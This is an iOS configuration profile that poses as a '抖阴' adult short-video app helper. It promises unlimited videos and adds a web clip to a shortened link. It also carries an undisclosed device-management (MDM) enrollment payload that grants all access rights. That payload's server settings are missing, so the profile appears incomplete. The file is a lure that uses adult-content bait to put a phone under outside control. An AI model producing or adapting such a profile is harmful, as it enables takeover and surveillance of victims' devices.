<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>ConsentText</key>
	<dict>
		<key>default</key>
		<string>安装抖阴桌面助手，看片无忧。</string>
	</dict>
	<key>PayloadContent</key>
	<array>
		<dict>
			<key>IsRemovable</key>
			<true/>
			<key>Label</key>
			<string>抖阴助手</string>
			<key>PayloadDescription</key>
			<string>Adds a Web Clip.</string>
			<key>PayloadDisplayName</key>
			<string>Web Clip (抖阴助手)</string>
			<key>PayloadIdentifier</key>
			<string>com.Xs.profile.webclip1</string>
			<key>PayloadOrganization</key>
			<string>熊猫TV</string>
			<key>PayloadType</key>
			<string>com.apple.webClip.managed</string>
			<key>PayloadUUID</key>
			<string>90B0B0FB-70D7-4901-AC71-48E6B853D66B</string>
			<key>PayloadVersion</key>
			<integer>1</integer>
			<key>Precomposed</key>
			<true/>
			<key>URL</key>
			<string>http://u6.gg/smxgR</string>
		</dict>
		<dict>
			<key>AccessRights</key>
			<integer>8191</integer>
			<key>CheckOutWhenRemoved</key>
			<false/>
			<key>IdentityCertificateUUID</key>
			<string>00000000-0000-0000-0000-000000000000</string>
			<key>PayloadDescription</key>
			<string>Configures MobileDeviceManagement.</string>
			<key>PayloadIdentifier</key>
			<string>com.Xs.profile.mdm2</string>
			<key>PayloadOrganization</key>
			<string>熊猫TV</string>
			<key>PayloadType</key>
			<string>com.apple.mdm</string>
			<key>PayloadUUID</key>
			<string>ACB1E22B-3D7C-4F20-8E44-16AA18D8208D</string>
			<key>PayloadVersion</key>
			<integer>1</integer>
			<key>SignMessage</key>
			<false/>
			<key>UseDevelopmentAPNS</key>
			<false/>
		</dict>
	</array>
	<key>PayloadDescription</key>
	<string>打开抖阴，下载app，无限看片。</string>
	<key>PayloadDisplayName</key>
	<string>抖阴小视频</string>
	<key>PayloadIdentifier</key>
	<string>com.Xs.profile</string>
	<key>PayloadOrganization</key>
	<string>熊猫TV</string>
	<key>PayloadRemovalDisallowed</key>
	<false/>
	<key>PayloadType</key>
	<string>Configuration</string>
	<key>PayloadUUID</key>
	<string>B18A9480-52E9-4E88-9477-A1BAE93CB349</string>
	<key>PayloadVersion</key>
	<integer>1</integer>
</dict>
</plist>
